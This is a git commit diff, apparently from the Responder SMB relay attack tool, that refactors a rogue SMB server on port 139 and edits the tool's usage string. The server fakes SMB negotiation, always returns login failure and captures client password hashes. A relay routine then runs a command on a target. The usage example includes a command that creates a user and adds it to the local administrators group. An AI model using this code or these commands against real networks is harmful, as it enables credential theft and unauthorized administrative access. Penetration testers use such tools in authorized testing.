minor changes

This commit is contained in:
lgandx 2014-01-27 22:10:50 -05:00
parent 583cdb7254
commit 4f239a2ef1


@ -29,7 +29,7 @@ def UserCallBack(op, value, dmy, parser):
args.extend(getattr(parser.values, op.dest)) args.extend(getattr(parser.values, op.dest))
setattr(parser.values, op.dest, args) setattr(parser.values, op.dest, args)
parser = optparse.OptionParser(usage="python %prog -i 10.20.30.40 -c 'net user Responder Quol0eeP/e}X /add &&net localgroup administrators Responder /add' -t 10.20.30.45 -r ", parser = optparse.OptionParser(usage="python %prog -i 10.20.30.40 -c 'net user Responder Quol0eeP/e}X /add &&net localgroup administrators Responder /add' -t 10.20.30.45 -u Administrator lgandx admin",
prog=sys.argv[0], prog=sys.argv[0],
) )
parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP") parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP")
@ -38,7 +38,7 @@ parser.add_option('-c',action='store', help='Command to run on the target.',meta
parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET") parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")
parser.add_option('-d',action="store", help="Target Domain for SMB relay (optional). This can be set to overwrite a domain logon (DOMAIN\Username) with the gathered credentials.",metavar="WORKGROUP",dest="Domain") parser.add_option('-d',action="store", help="Target Domain for SMB relay (optional). This can be set to overwrite a domain logon (DOMAIN\Username) with the gathered credentials. Woks on NTLMv1",metavar="WORKGROUP",dest="Domain")
parser.add_option('-u', '--UserToRelay', action="callback", callback=UserCallBack, dest="UserToRelay") parser.add_option('-u', '--UserToRelay', action="callback", callback=UserCallBack, dest="UserToRelay")
@ -198,43 +198,48 @@ def Parse_Nego_Dialect(data):
return "\x0a\x00" return "\x0a\x00"
def SmbRogueSrv139(key,Target,DomainMachineName): def SmbRogueSrv139(key,Target,DomainMachineName):
try: s = socket(AF_INET,SOCK_STREAM)
s = socket(AF_INET,SOCK_STREAM) s.setsockopt(SOL_SOCKET,SO_REUSEADDR, 1)
s.setsockopt(SOL_SOCKET,SO_REUSEADDR, 1) s.settimeout(30)
s.bind(('0.0.0.0', 139)) try:
s.listen(0) s.bind(('0.0.0.0', 139))
s.settimeout(30) s.listen(0)
conn, addr = s.accept() conn, addr = s.accept()
while True: except error, msg:
data = conn.recv(1024) if "Address already in use" in msg:
##session request 139 print '\033[31m'+'Something is already listening on TCP 139, did you set SMB = Off in Responder.conf..?\nSMB Relay will not work.'+'\033[0m'
if data[0] == "\x81":
buffer0 = "\x82\x00\x00\x00" try:
conn.send(buffer0) while True:
##Negotiate proto answer. data = conn.recv(1024)
if data[8:10] == "\x72\x00": ##session request 139
head = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x53\xc8",pid=pidcalc(data),tid=tidcalc(data)) if data[0] == "\x81":
t = SMBNegoAns(Dialect=Parse_Nego_Dialect(data),Key=key,Domain=DomainMachineName) buffer0 = "\x82\x00\x00\x00"
t.calculate() conn.send(buffer0)
packet1 = str(head)+str(t) ##Negotiate proto answer.
buffer1 = longueur(packet1)+packet1 if data[8:10] == "\x72\x00":
conn.send(buffer1) head = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x53\xc8",pid=pidcalc(data),tid=tidcalc(data))
##Session Setup AndX Request t = SMBNegoAns(Dialect=Parse_Nego_Dialect(data),Key=key,Domain=DomainMachineName)
if data[8:10] == "\x73\x00": t.calculate()
if Is_Anonymous(data): packet1 = str(head)+str(t)
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) buffer1 = longueur(packet1)+packet1
packet1 = str(head)+str(SMBSessEmpty())
buffer1 = longueur(packet1)+packet1
conn.send(buffer1) conn.send(buffer1)
else: ##Session Setup AndX Request
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xC0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) if data[8:10] == "\x73\x00":
packet1 = str(head)+str(SMBSessEmpty())#Return login fail anyways. if Is_Anonymous(data):
buffer1 = longueur(packet1)+packet1 head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
conn.send(buffer1) packet1 = str(head)+str(SMBSessEmpty())
Credz = ParseHash(data,addr[0],Target) buffer1 = longueur(packet1)+packet1
return Credz conn.send(buffer1)
except: else:
return None head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xC0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
packet1 = str(head)+str(SMBSessEmpty())#Return login fail anyways.
buffer1 = longueur(packet1)+packet1
conn.send(buffer1)
Credz = ParseHash(data,addr[0],Target)
return Credz
except:
return None
def RunRelay(host, Command,Domain): def RunRelay(host, Command,Domain):
Target = host Target = host
@ -419,6 +424,7 @@ def RunRelay(host, Command,Domain):
if data[8:10] != "\x2e\x00": if data[8:10] != "\x2e\x00":
return False return False
def RunInloop(Target,Command,Domain): def RunInloop(Target,Command,Domain):
try: try:
while True: while True: